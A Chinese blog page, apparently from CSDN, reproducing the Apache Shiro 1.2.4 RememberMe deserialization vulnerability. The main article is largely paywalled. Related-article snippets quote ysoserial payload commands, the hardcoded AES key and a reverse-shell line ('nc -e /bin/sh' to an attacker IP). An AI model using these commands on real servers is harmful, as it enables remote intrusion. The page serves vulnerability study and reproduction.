Shiro RememberMe 1.2.4 反序列化命令执行漏洞复现

最新推荐文章于 2025-11-01 18:09:44 发布
原创 最新推荐文章于 2025-11-01 18:09:44 发布 · 6.7k 阅读 · 0 ·
CC 4.0 BY-SA版权
本文为博主原创文章,未经博主允许不得转载,否则追究法律责任。
文章标签:

#shiro

本文详细介绍了Apache Shiro 1.2.4版本中的RememberMe功能存在的反序列化命令执行漏洞。影响版本为Apache Shiro <= 1.2.4,其默认使用的commons-collections版本为3.2.1。在环境搭建后,通过抓包测试发现响应中包含'rememberme',表明存在漏洞。进一步的漏洞复现步骤包括监听回弹shell、利用ysoserial的JRMP监听模块生成payload并重放,最终成功触发漏洞,获取shell。在Windows环境中,需要结合其他工具进行操作。

影响版本

Apache Shiro <= 1.2.4

默认shiro的commons-collections版本为3.2.1,
在这里插入图片描述

环境搭建

在这里插入图片描述
在这里插入图片描述

漏洞测试

  1. 抓包测试

查看返回包里setcookie有rememberme的字样
在这里插入图片描述
继续测试
首先最简单的测试方法是用dnslog,看看是否有回显。
利用密钥生成rememberMe

在这里插入图片描述

在这里插入图片描述

最低0.47元/天 解锁文章
Apache Shiro 1.2.4 反序列化漏洞(CVE-2016-4437 )
渗透之路,攻防之间皆学问
03-28 1万+
Shiro 1.2.4 反序列化漏洞
Shiro RememberMe 1.2.4 反序列化命令执行漏洞复现 kali docker
mohanhan
06-23 2614
Shiro RememberMe 1.2.4 反序列化命令执行漏洞复现漏洞环境搭建漏洞复现反弹shell题外话1题外话2 影响版本:Apache Shiro <= 1.2.4 漏洞产生原因: shiro默认使用了CookieRememberMeManager,其处理cookie的流程是:得到rememberMe的cookie值–>Base64解码–>AES解密–>反序列化。 然而AES的密钥是硬编码的,就导致了攻击者可以构造恶意数据造成反序列化的RCE漏洞。使用大佬脚本生成 payl
Shiro RememberMe 1.2.4 反序列化漏洞(SSV-92180)
你和萤火虫有两个共同点,在我的眼里都会发光,同时,都已经很多年没见了
06-21 3879
1Shiro运行环境 Apache Shiro 是 Java 的权限及安全验证框架 下载地址:https://repo1.maven.org/maven2/org/apache/shiro/shiro-root/1.2.4/ 修改pom.xml包中jstl和commons-beanutils的版本,用于配合漏洞执行环境 <dependency> <groupId>javax.servlet</groupId> <artifactId>jstl
SHIRO-550:Shiro RememberMe 1.2.4反序列化突破
03-10
Shiro RememberMe 1.2.4反序列化突破(SHIRO-550) commons-collections-3.2.1.jar java -jar ysoserial-0.0.6-SNAPSHOT-all.jar JRMPClient "10.10.20.166:12345" |python exp.py java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 12345 CommonsCollections5 'nc -e /bin/sh 192.168.5.86 8989' nc -nlvp 8989 python用法: python3 shiro_rce.py _____ _ _ _____ _____ ____ _____ _____ __
Shiro 反序列化
最新发布
2502_91116367的博客
11-01 997
摘要 本文详细分析了Apache Shiro 1.2.4及以下版本的反序列化漏洞Shiro-550)。该漏洞源于RememberMe功能的AES加密机制存在缺陷:加密密钥硬编码为"kPH+bIxk5D2deZiIxcaaaA==",且未对反序列化进行安全过滤。攻击者可构造恶意Cookie,通过AES-CBC加密伪造序列化数据,最终触发ObjectInputStream.readObject()导致RCE。文章还提供了完整的漏洞环境搭建方法(JDK8u65+Tomcat8+Shiro1.
shiro反序列化漏洞复现(CVE-2016-4437)
huangyongkang666的博客
04-14 4192
shiro反序列化漏洞复现(CVE-2016-4437) 1.漏洞简介 Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。使用Shiro易于理解的API,开发者可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序 漏洞原理: 在Shiro <= 1.2.4中,反序列化过程中所用到的AES加密的key是硬编码在源码中,当用户勾选RememberMe并登录成功,Shiro会将用户的cookie值序列化,AES加密,接着base64
Apache Shiro RememberMe 1.2.4 反序列化过程命令执行漏洞【原理扫描】
Gblfy_Blog
12-06 4656
文章目录一、分析定位1. 漏洞描述2. 项目引发漏洞简述二、解决方案2.1. 若依系统2.2. Gus系统 一、分析定位 1. 漏洞描述 目前厂商已经发布了新版本修复这个安全问题,请到厂商的主页下载: https://issues.apache.org/jira/browse/SHIRO-550 https://shiro.apache.org/download.html 2. 项目引发漏洞简述 若依/Guns管理系统使用了Apache ShiroShiro 提供了记住我(RememberM
精选资源
ShiroScan:Shiro RememberMe 1.2.4反序列化入侵图形化检测工具(Shiro-550)
03-18
Shiro反序列化检测工具 ShiroScan用于检测存在四郎反序列化漏洞的关键值。有三种方式进行检测,第一种是利用URLDNS进行检测,第二种利用命令执行进行检测,第三种使用SimplePrincipalCollection序列化后进行检测...
Shiro1.2.4反序列化漏洞检测与复现
qq_45396375的博客
12-20 2087
用户勾选RememberMe登录后,shiro框架将用户信息进行序列化,序列化的内容进行AES加密,再使用base64编码,最后给用户返回一个rememberMe的cookie。 而AES加密采用了一个固定的key kPH+bIxk5D2deZiIxcaaaA==,因此攻击者可以构造恶意的代码,将恶意代码进行序列化,再通过固定key对恶意代码进行AES加密,再base64编码 攻击者将这段恶意数据替换为正常的cookie值,这段cookie值发到后台后,shiro框架会将这段加密数据进行base64解码,
网络安全深入学习第五课——热门框架漏洞(RCE— Apache Shiro 1.2.4反序列化漏洞
p36273的博客
09-18 1121
----- 当程序在进行反序列化时,会自动调用一些函数,以PHP为例有__wakeup()、__destruct()等函数,Java中有readObject()方法等等,但是如果传入函数的参数可以被用户控制的话,用户可以输入一些恶意代码到函数中,从而导致反序列化漏洞。------ Shiro提供了记住我(RememberMe)的功能,比如访问淘宝等网站时,关闭了浏览器下次再打开时还是能够记住上次访问过的用户,下次访问时无需再登录即可访问。根据字节流中保存的对象状态及描述信息,通过反序列化重建对象。
php5.5 反序列化利用工具_【漏洞复现Shiro RememberMe 1.2.4 反序列化命令执行漏洞...
weixin_39619433的博客
11-26 464
0x00 影响版本Apache Shiro <= 1.2.40x01 原因分析Apache Shiro默认使用了CookieRememberMeManager,其处理cookie的流程是:得到rememberMe的cookie值 > Base64解码–>AES解密–>反序列化。然而AES的密钥是硬编码的,就导致了攻击者可以构造恶意数据造成反序列化的RCE...
Shiro RememberMe 1.2.4 反序列化漏洞(Shiro-550, CVE-2016-4437)复现
whojoe的博客
05-10 1569
Shiro RememberMe 1.2.4 反序列化漏洞复现前言开始环境搭建工具准备1.shiro_poc.py2.ysoserial的jar文件安装模块开始执行参考文章 前言 接下来一段时间要做漏洞复现和代码审计,算是一个小目标把 开始 环境搭建 使用docker复现 启动docker systemctl start docker 下载镜像和启动环境 docker pull medicean/vulapps:s_shiro_1 docker run -d -p 81:8080 medicean/vul
Apache Shiro 1.2.4反序列化漏洞(CVE-2016-4437)
m0_61506558的博客
11-06 3096
关于shiro2019年爆出来的漏洞,利用的条件相对来说比较苛刻,不仅要有一定的权限登入进去,进去之后密钥爆破也不一定可以成功,环境不好搭建,感兴趣的师傅可以看看,本篇文章介绍的是有关shiro反序列化漏洞,(一)基本介绍。
Apache Shiro RememberMe 1.2.4 反序列化漏洞
ddr12231的博客
08-08 1705
拉取镜像 docker pull medicean/vulapps:s_shiro_1 启动环境 docker run -d -p 80:8080 medicean/vulapps:s_shiro_1 拉取镜像中.....呵呵 ! 网太慢,有时间再弄 转载于:https://www.cnblogs.com/mrhonest/p/11320498.html...
漏洞复现系列--Shiro RememberMe 1.2.4 反序列化漏洞
梦之旅行地
02-05 2791
1漏洞利用前提: Apache Shiro <= 1.2.4 2、靶场: 利用vulhub的靶场在服务器上搭建 注:docker相关配置就没有写了,靶场能运行就行 靶场搭建 git clone https://github.com/vulhub/vulhub.git cd /vulhub/shiro/CVE-2016-4437 docker-compose up -d #启动靶场 启...
漏洞复现Shiro 反序列化漏洞
2301_80115097的博客
11-08 2720
Apache Shiro是一款开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。Apache Shiro 1.2.4及以前版本中,加密的用户信息序列化后存储在名为remember-me的Cookie中。攻击者可以使用Shiro的默认密钥伪造用户Cookie,触发Java反序列化漏洞,进而在目标机器上执行任意命令。该款工具特别适合初学者,配置了各种OA漏洞利用板块,还有shiro、struts2等框架漏洞漏洞利用板块,还有一键执行命令的功能!!
Apache Shiro 1.2.4反序列化漏洞
Tcho___的博客
03-17 776
Apache Shiro 1.2.4反序列化漏洞 shiro Apache Shiro是一款开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。 Apache Shiro 1.2.4及以前版本中,加密的用户信息序列化后存储在名为remember-me的Cookie中。攻击者可以使用Shiro的默认密钥伪造用户Cookie,触发Java反序列化漏洞,进而在目标机器上执行任意命令。 shiro提供的rememberMe的功能,登入页面时勾选rememberMe
掌握Shiro RememberMe 1.2.4远程代码执行漏洞
Shiro框架中,如果RememberMe功能没有得到正确的处理,攻击者可以利用该漏洞构造特定的输入,造成反序列化过程中的任意代码执行,从而突破安全限制,获取非法的访问权限。 ### 知识点四:Shiro RememberMe 1.2.4...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值